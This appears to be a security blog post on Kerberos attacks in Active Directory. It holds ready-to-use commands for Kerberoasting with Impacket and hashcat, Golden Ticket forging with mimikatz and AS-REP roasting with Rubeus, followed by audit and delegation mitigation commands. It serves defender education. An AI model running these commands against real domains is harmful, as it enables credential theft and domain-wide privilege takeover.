Kerberos Attacks & Mitigations

By /

Listen to this Post

👉🏻 What are Kerberos Attacks?

Kerberos is the predominant authentication protocol used in Microsoft Active Directory, replacing the older NTLM (New Technology LAN Manager). It offers enhanced security by using tickets for authentication. Domain users authenticate against the Key Distribution Center (KDC) and the Authentication Service (AS), typically hosted on domain controllers.

👉🏻 What topics are covered in the document?

  • Kerberos Terminology
  • Process Overview
  • Golden Tickets
  • Silver Tickets
  • Kerberoasting
  • AS-REP Roasting
  • Mitigations for all Attacks

Practice-Verified Commands and Codes

1. Kerberoasting Attack

Use `Impacket`’s `GetUserSPNs.py` to extract service account hashes:

python3 GetUserSPNs.py -dc-ip <DC_IP> <DOMAIN>/<USER>:<PASSWORD> -outputfile hashes.txt

Crack the extracted hashes using `hashcat`:

hashcat -m 13100 hashes.txt /path/to/wordlist.txt

2. Golden Ticket Attack

Generate a Golden Ticket using `mimikatz`:

mimikatz # kerberos::golden /admin:Administrator /domain:<DOMAIN> /sid:<SID> /krbtgt:<KRBTGT_HASH> /ptt

Verify the ticket:

klist

3. AS-REP Roasting

Use `Rubeus` to request AS-REP hashes:

Rubeus.exe asreproast /user:<USER> /format:hashcat /outfile:asrep_hashes.txt

Crack the hashes with `hashcat`:

hashcat -m 18200 asrep_hashes.txt /path/to/wordlist.txt

4. Mitigation Commands

  • Enable Kerberos auditing: 
    auditpol /set /subcategory:"Kerberos Service Ticket Operations" /success:enable /failure:enable
  • Restrict service account permissions: 
    Set-ADAccountControl -Identity <SERVICE_ACCOUNT> -TrustedForDelegation $false

What Undercode Say

Kerberos remains a cornerstone of secure authentication in Active Directory environments, but its complexity and widespread use make it a prime target for attackers. Understanding the mechanics of Kerberos attacks, such as Golden Tickets, Silver Tickets, Kerberoasting, and AS-REP Roasting, is crucial for defenders. Mitigation strategies include enforcing strong password policies, enabling auditing, and restricting service account permissions.

For further reading, explore these resources:

By mastering these techniques and commands, you can better secure your environment against Kerberos-based threats. Always stay updated with the latest security patches and best practices to mitigate evolving attack vectors.

References:

Hackers Feeds, Undercode AIFeatured Image

Related Posts: